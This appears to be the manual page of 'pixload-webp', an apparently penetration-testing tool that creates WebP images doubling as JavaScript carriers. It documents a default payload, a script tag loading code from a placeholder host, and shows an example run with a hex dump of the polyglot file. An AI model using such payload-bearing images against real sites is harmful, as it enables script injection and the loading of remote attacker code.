=pod

=encoding UTF-8

=head1 NAME

pixload-webp - hide payload/malicious code in WebP images

=head1 SYNOPSIS

B<pixload-webp> [I<OPTION>]... I<FILE>

=head1 DESCRIPTION

B<pixload-webp> creates a WebP Image with payload, or injects payload
into existing image.

Currently, there is no possibility to inject the payload into an existing
WebP image. Only the new (minimal) WebP image will be created and your
payload will be injected into.

=head1 OPTIONS

Mandatory arguments to long options are mandatory for short options too.

=over 8

=item B<-P>, B<--payload> I<STRING>

Set payload for injection.
Default is C<< <script src=//example.com></script> >>.

=item B<-v>, B<--version>

Print version and exit.

=item B<-h>, B<--help>

Print help and exit.

=back

If the output FILE already exists, the payload will be injected into existing
image, but this image will be corrupted. Otherwise, the new one will be
created.

=head1 EXAMPLE

  $ pixload-webp payload.webp
  ..... WebP Payload Creator/Injector ......
  ..........................................
  ... https://github.com/sighook/pixload ...
  ..........................................

  [>] Generating output file
  [✔] File saved to: payload.webp

  [>] Injecting payload into payload.webp
  [✔] Payload was injected successfully

  payload.webp: RIFF (little-endian) data, Web/P image

  00000000  52 49 46 46 2f 2a 00 00  57 45 42 50 56 50 38 4c  |RIFF/*..WEBPVP8L|
  00000010  ff ff ff 00 2f 00 00 00  10 07 10 11 11 88 88 fe  |..../...........|
  00000020  07 00 2a 2f 3d 31 3b 3c  73 63 72 69 70 74 20 73  |..*/=1;<script s|
  00000030  72 63 3d 2f 2f 65 78 61  6d 70 6c 65 2e 63 6f 6d  |rc=//example.com|
  00000040  3e 3c 2f 73 63 72 69 70  74 3e 3b                 |></script>;|
  0000004b

=head1 SEE ALSO

L<pixload-bmp(1)|https://github.com/sighook/pixload/blob/master/pixload-bmp.1.pod>,
L<pixload-gif(1)|https://github.com/sighook/pixload/blob/master/pixload-gif.1.pod>,
L<pixload-jpg(1)|https://github.com/sighook/pixload/blob/master/pixload-jpg.1.pod>,
L<pixload-png(1)|https://github.com/sighook/pixload/blob/master/pixload-png.1.pod>

=cut
